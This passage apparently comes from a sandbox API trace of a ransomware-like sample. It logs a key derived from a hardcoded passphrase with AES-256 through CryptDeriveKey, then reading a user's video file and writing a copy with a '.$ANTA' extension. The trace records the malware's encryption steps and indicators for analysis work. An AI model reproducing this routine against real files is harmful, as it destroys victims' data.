lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0104.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0104.186] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0104.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0104.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2848, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0104.187] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0104.187] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0104.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0104.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43caaf0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0104.187] CryptHashData (hHash=0x41ac280, pbData=0x17e28a8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0104.187] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0104.187] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0104.187] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0104.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0104.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cac70, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0104.187] CryptDeriveKey (in: hProv=0x41a5360, Algid=0x6610, hBaseData=0x41ac280, dwFlags=0x1, phKey=0x144e070 | out: phKey=0x144e070*=0x41ac780) returned 1 [0104.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0104.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea0b8 [0104.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0104.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0104.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0104.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0104.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0104.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0104.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0104.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0104.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0104.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0104.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0104.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0104.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0104.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0104.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0104.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0104.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0104.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0104.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0104.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0104.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0104.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0104.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0104.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0104.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0104.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0104.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0104.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9e90 [0104.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0104.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0104.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0104.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0104.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0104.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0104.188] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0104.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0104.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0104.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0104.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0104.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0104.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0104.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0104.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad30 [0104.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab98 [0104.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad48 [0104.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0104.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab08 [0104.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab68 [0104.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabc8 [0104.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab80 [0104.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0104.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caaf0 [0104.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0104.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cacd0 [0104.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0104.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cace8 [0104.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad00 [0104.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0104.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad18 [0104.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa90 [0104.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0104.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabb0 [0104.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caaa8 [0104.189] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0104.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0104.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0104.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0104.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ce8 [0104.190] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0104.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabf8 [0104.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0104.190] PeekMessageW (in: lpMsg=0x144e1ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e1ac) returned 0 [0104.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0104.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0104.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0104.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0104.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0104.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0104.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0104.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0104.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0104.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0104.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0104.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0104.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0104.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0104.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0104.190] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0104.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0104.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0104.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0104.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0104.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0104.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0104.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0104.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0104.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0104.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0104.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0104.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0104.191] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0104.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1797128 [0104.191] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0104.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0104.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0104.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0104.191] CryptDestroyHash (hHash=0x41ac280) returned 1 [0104.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0104.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9e90 [0104.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0104.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0104.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0104.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0104.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0104.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0104.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0104.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0104.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0104.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0104.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0104.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0104.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0104.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0104.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0104.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0104.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0104.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0104.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9e90 [0104.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0104.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0104.193] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0104.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0104.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0104.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0104.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0104.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0104.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0104.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0104.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0104.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0104.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0104.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0104.194] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yzzjzdDz73JlAs1uEFCr.avi" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yzzjzddz73jlas1uefcr.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0104.194] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.194] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7a8 | out: lpNewFilePointer=0x0) returned 1 [0104.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0104.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0104.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0104.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0104.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0104.194] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0104.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0104.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0104.195] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0104.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0104.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0104.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0104.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0104.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0104.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0104.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0104.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0104.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0104.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0104.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0104.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0104.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0104.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0104.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0104.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0104.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0104.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0104.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0104.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0104.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0104.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0104.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0104.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x43eba18 [0104.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0104.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4508 [0104.196] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca")) returned 0x10 [0104.196] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yzzjzdDz73JlAs1uEFCr.avi.$ANTA" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yzzjzddz73jlas1uefcr.avi.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0104.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0104.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0104.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0104.201] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7f8 | out: lpNewFilePointer=0x0) returned 1 [0104.201] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e820*=0xcb31, lpOverlapped=0x0) returned 1 [0104.203] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e820*=0x0, lpOverlapped=0x0) returned 1 [0104.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0104.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0104.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0104.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0104.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xcb31) returned 0x4516010 [0104.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0e020 | out: hHeap=0x1780000) returned 1 [0104.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0104.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0104.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0104.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0104.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0104.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xcb31) returned 0x4522b50 [0104.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0104.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0104.209] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0104.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0104.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0104.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0104.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0104.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0104.209] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xcb31) returned 0x4516010 [0104.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0104.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 